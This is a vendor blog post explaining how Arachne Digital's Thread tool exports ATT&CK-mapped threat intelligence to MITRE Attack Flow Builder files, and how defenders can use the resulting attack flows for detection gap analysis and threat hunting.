From Reports to Routes: Visualising Adversary Paths with Thread and MITRE Attack Flow Builder

Originally published at Arachne Digital.Why “flows” are the next leap for threat‑informed defenceATT&CK already gives us the what of adversary behaviour. Attack Flow adds the how, showing the exact sequence, branching options, and dependencies an attacker follows to reach their objective. MITRE’s Center for Threat‑Informed Defense created the Attack Flow language so defenders can track multi‑phase campaigns instead of isolated techniques, spot choke points, and prioritise counter‑measures more effectively.Traditional incident write‑ups or Navigator layers capture individual events but don’t capture the bigger picture. By modelling a chain of tactics, initial access, privilege escalation, lateral movement, impact, security operations center (SOC) analysts can:Surface weak links an attacker must traverse.Map detections to every step, avoiding gaps between stages.Share machine‑readable flows across blue‑team tools (the format is STIX‑compatible).Attack Flow BuilderThe web based Attack Flow Builder is MITRE’s canvas for turning raw cyber‑attack data into an interactive storyline. Inside the browser you drag‑and‑drop ATT&CK techniques, assets, malware, vulnerabilities, and indicators onto a blank board, then draw arrows to show the exact order, or parallel paths, in which those elements unfold during a real intrusion. Each node stores full metadata, so a single click can reveal discovery timestamps, references, or detection logic.From there you can overlay the finished diagram on the classic ATT&CK matrix to see defensive coverage at a glance, or export the model in multiple formats, STIX for automation pipelines, a standalone .afb file for sharing, PNG for slide decks, or even Markdown‑friendly Mermaid code for wikis. Because every element in the flow is machine‑readable, teams can version‑control their diagrams and attach them to post‑incident reports without re‑formatting.In short, the Builder transforms a static list of tactics, techniques and procedures (TTPs) into a living map that SOC analysts, threat hunters, and CISOs can all read, refine, and act on.Thread to Attack Flow: closing the loop between cyber threat intelligence and actionThread already maps free‑text reporting to ATT&CK TTPs, dates, IOCs, and victims. Our new “Export Flow AFB” button turns that structured output into a ready‑made Attack Flow file you can open in the Builder. No manual re‑typing, no copy‑paste from PDFs.How this works in practiceThread uses machine learning to map free text to ATT&CK TTPsA human analyst accepts or rejects the TTPs, and adds any that Thread might have missed. They also add a time frame, aggressor and victim information, and tag any indicators of compromise (IoCS).Once the report is processed in Thread, the analyst clicks Export Attack Flow AFB, Thread serialises the TTPs and IoCs into the Attack Flow v3 schema, bundles them as incident-name.afb, and delivers it straight to your browser.Open the incident-name.afb file in Attack Flow Builder, and your TTPs and IoCs are all there. Use the Builder to structure your flow.For this first iteration of integrating Thread with Attack Flow, we didn’t want to recreate the functionality that already exists in Flow Builder to order your flow. We’ve also only added support for some of the basic data types, like TTPs, malware, and IoCs. However, Thread is open source and continues to evolve. More improvements are coming, follow along with us on GitHub as we continue to develop Thread, and you can always make community contributions!Where attack flows shine in day‑to‑day operationsDetection gap analysis — Overlay flow on ATT&CK Navigator to see which stages lack telemetry. You can create both the Navigator and the Flow Builder output from Thread.Post‑incident reviews — Replace static slide decks with clickable flows that link directly to log evidence.Adversary emulation — Feed exported STIX into tools like Caldera to replay an attacker’s exact sequence.Executive reporting — One diagram communicates campaign scope better than ten bullet points.Flows are also great for threat hunting. Let’s take a closer look…Using Attack Flows to Supercharge Threat HuntingThreat hunting succeeds or fails on the quality of its hypotheses. Seasoned hunters begin by asking a structured question, “Could adversary X reach asset Y by chaining techniques A, B, and C?”, and then seek telemetry to prove or disprove it. Industry playbooks all outline the same core loop:Generate a hypothesisAssemble the right dataInvestigateValidateFeed lessons back into detectionsThread helps with the hardest, and most crucial part of that loop, hypothesis generation, by delivering cyber threat intelligence already mapped to ATT&CK. Each finished Thread report has real‑world context, such as timestamps, artifacts, and links to the original source. Instead of inventing scenarios from scratch, that may or may not be relevant, hunters start with evidence‑backed chains that adversaries have actually used.Attack Flow then takes those ATT&CK‑tagged gems and arranges them in a machine‑readable storyline. Seeing that a phishing email (T1566) led to template injection (T1221), which cascaded into LSASS credential dumping (T1003.001), tells the hunter where to look next if the first query hits. Flows expose decision branches (“if privilege escalation fails, attacker falls back to Kerberoasting”), ensuring hunts follow every plausible path, not just the obvious or easy ones. They also help teams avoid the classic “rabbit‑hole” problem of chasing an endless number of possible but irrelevant scenarios.The result is a repeatable, evidence‑driven methodology:Scope and Objective — Import the Thread‑generated .afb into Builder, and choose the branch that threatens your crown‑jewel asset. You can see that a cyber threat actor, that recently targeted an industry peer in the same geography as you, used Ingress Tool Transfer to deploy tools to a company device, and then immediately pulled up a command prompt to start gathering data.Hypothesis — “If any host shows the Technique Command and Scripting Interpreter (T1059) within five minutes of Ingress Tool Transfer (T1105), we may have an intrusion in progress.”Data Collection & Hunt — Pull endpoint and network logs keyed to those technique IDs. ATT&CK gives guidance around this under the Detections section of each TTP.Investigation & Validation — Follow the flow’s arrows to pivot from one TTP to the next.Detection Engineering — Convert successful queries into permanent analytics, and update the flow if new intelligence shifts the sequence.In short, flows give hunters a roadmap. They keep every query tied to a real adversary behaviour, eliminate guesswork, and let teams measure coverage by ticking off techniques. This provides the structure SOC analysts crave and the accountability IT security managers need.ResourcesFor those that want to learn more about Attack Flows and Thread, the below resources have you covered:The Attack Flow V3 pageAttack Flow on GitHubAttack Flow BuilderAttack Flow TrainingThreadThread on GitHubHow to use ThreadStart building Attack FlowsAttack Flow turns static cyber threat intelligence into an interactive map of attacker behaviour. By integrating Thread with the Flow Builder, Arachne Digital removes the busywork of diagramming and empowers SOC teams to see, share, and counter multi‑stage campaigns faster than ever.Ready to try it? Log in to Thread, process a report, and hit Export Flow AFB. If you don’t want to go through the hassle of gathering cyber threat intelligence and mapping it to MITRE ATT&CK all by yourself, reach out to us about our API offering.From Reports to Routes: Visualising Adversary Paths with Thread and MITRE Attack Flow Builder was originally published in MeetCyber on Medium, where people are continuing the conversation by highlighting and responding to this story.